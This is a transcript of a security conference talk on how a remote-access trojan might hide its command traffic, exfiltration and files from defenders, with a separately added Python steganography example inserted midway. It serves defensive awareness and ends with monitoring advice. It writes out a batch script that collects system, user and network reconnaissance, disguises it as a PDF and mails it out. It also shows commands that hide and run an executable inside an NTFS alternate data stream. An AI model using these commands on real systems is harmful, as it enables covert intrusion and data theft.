CodeStock14: Hiding in Plain Sight
Transcript of CodeStock14: Hiding in Plain Sight
Hiding in Plain Sight
Presented by / Rob Gillen @argodev
This work is licensed under a Creative Commons Attribution 4.0 International License.
This talk and related resources are available online: https://github.com/argodev/talks/
Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. I reserve the right to change my views and opinions at any time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
HTDCS: Helpdesk Ticket Driven Cyber Security
Overview
- RAT Design
- Encryption
- Command/Control (C2)
- AntiVirus
- Behavior
RAT Design
- Exe is dropped via infected page
- Queries web page for commands
- Performs commands if not done previously
- Periodically polls for new commands
Encryption
- Complex encryption is trivial
- PBKDF: scrypt, a sequential memory-hard function
- Many iterations (> 10K)
- Long key lengths
Encryption Example
- Above configuration is custom-hardware resistant
- Takes approximately ¼ second per guess
Command/Control
- Use Web2C approach
- Commands are “issued” en masse via normal, benign-looking web pages
- Common ports
- Leverages existing HTML/server constructs
Command Text
ipconfig /all > %APPDATA%\info.txt
net start >> %APPDATA%\info.txt
tasklist /v >> %APPDATA%\info.txt
net user >> %APPDATA%\info.txt
net localgroup administrators >> %APPDATA%\info.txt
netstat -ano >> %APPDATA%\info.txt
net use >> %APPDATA%\info.txt
copy %APPDATA%\info.txt %APPDATA%\output.pdf
del %APPDATA%\info.txt
sendmail %APPDATA%\output.pdf Status Update “Jones, William E. [email protected]” [email protected] smtp.yourorg.gov
del %APPDATA%\output.pdf
Mimic User Behavior: Traffic Rates
- Monitor incoming/outgoing network traffic for X days
- Configure exfil to stay within X% of “normal”
C2
- Exponential/randomized stand-down
- Only communicate during periods of activity
Mimic User Behavior: Target URLs
- Monitor outgoing web queries/URLs for X days
- Use similar domain names for malicious traffic
- Append similar/same query strings to malicious requests
Hiding in Logs
v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-9a.sjc.drpbox.com
ip-69-31-29-228.nlayer.net
a23-47-20-211.deploy.static.akamaitechnologies.com
l3.ycs.vip.dcb.yahoo.com
ir2.fp.vip.bf1.yahoo.com
www.nbcnews.com.edgesuite.net
wac.946A.edgecastcdn.net
a2.twimg.com
Other Hiding Techniques
- Office file content embedding
- Creative location
- Alternate Data Streams
- Least Significant Bit
- Network protocol manipulation
Creative File Locations
Alternate Data Streams
- Feature of NTFS since NT 3.5.1
- Used for metadata and compatibility with other file systems
So What?
#notepad pcast-nitrd-report-2010.pdf:secret.txt
What about this?
#type evil.exe > notepad.exe:evil.exe
#start notepad.exe:evil.exe
Crude Image Stego: LSB
- Least Significant Bit: alter it and encode the message across the LSBs of various bytes
- Visually imperceptible
- Computationally challenging to detect
- Encryption also an option
LSB: How It Works
Carrier Image
Image Data:
- Size: 2.1 MB
- Dimensions: 3500 x 2343 px
- Resolution: 300 dpi
- Bit Depth: 24
- ~8 megapixels
“Secret” Message: Welcome! Remember, things aren’t always what they seem.
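The embedding the slide describes, as an added example that is not code from the talk: it hides the slide's message one bit per colour sample in a constructed 24-bit pixel buffer, recovers it, and computes how much the slide's 3500 x 2343 carrier could hold. The length header, the gradient "carrier" and the helper names are my own assumptions.

```python
# Added example (not from the talk): hide a message one bit per colour
# sample in a 24-bit pixel buffer, recover it, and measure the pixel change.
# Header layout, helper names and the gradient "carrier" are my assumptions.

SLIDE_MESSAGE = "Welcome! Remember, things aren’t always what they seem."

def lsb_capacity_bytes(width: int, height: int, channels: int = 3) -> int:
    """Payload bytes a carrier can hold at one bit per channel sample."""
    return width * height * channels // 8

def lsb_embed(carrier: bytearray, payload: bytes) -> bytearray:
    """Return a copy of carrier whose LSBs hold a 4-byte big-endian
    length header followed by payload (MSB of each byte first)."""
    data = len(payload).to_bytes(4, "big") + payload
    if len(data) * 8 > len(carrier):
        raise ValueError("payload does not fit in carrier")
    out = bytearray(carrier)
    pos = 0
    for byte in data:
        for shift in range(7, -1, -1):
            out[pos] = (out[pos] & 0xFE) | ((byte >> shift) & 1)
            pos += 1
    return out

def lsb_extract(stego: bytearray) -> bytes:
    """Read the length header, then that many payload bytes, from LSBs."""
    def read(start: int, count: int) -> bytes:
        result = bytearray()
        for k in range(count):
            value = 0
            for j in range(8):
                value = (value << 1) | (stego[start + 8 * k + j] & 1)
            result.append(value)
        return bytes(result)
    length = int.from_bytes(read(0, 4), "big")
    return read(32, length)

def max_pixel_delta(a: bytearray, b: bytearray) -> int:
    """Largest per-sample change; LSB embedding never exceeds 1."""
    return max(abs(x - y) for x, y in zip(a, b))

def demo() -> tuple:
    """Embed the slide's message in a constructed 64x64 gradient carrier."""
    carrier = bytearray((i * 7) % 256 for i in range(64 * 64 * 3))
    stego = lsb_embed(carrier, SLIDE_MESSAGE.encode("utf-8"))
    return lsb_extract(stego).decode("utf-8"), max_pixel_delta(carrier, stego)

if __name__ == "__main__":
    print(lsb_capacity_bytes(3500, 2343), "payload bytes fit the slide's carrier")
```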
LSB Blow Up
Network Protocol Abuse
Challenges of Signature-Based Tools
Next Steps
- Know what you can and can’t see
- Consider implications of your monitoring strategy
- Behavior *must* play a role
Questions/Contact
Rob Gillen
[email protected]
http://rob.gillenfamily.net
@argodev
This talk and related resources are available online: https://github.com/argodev/talks/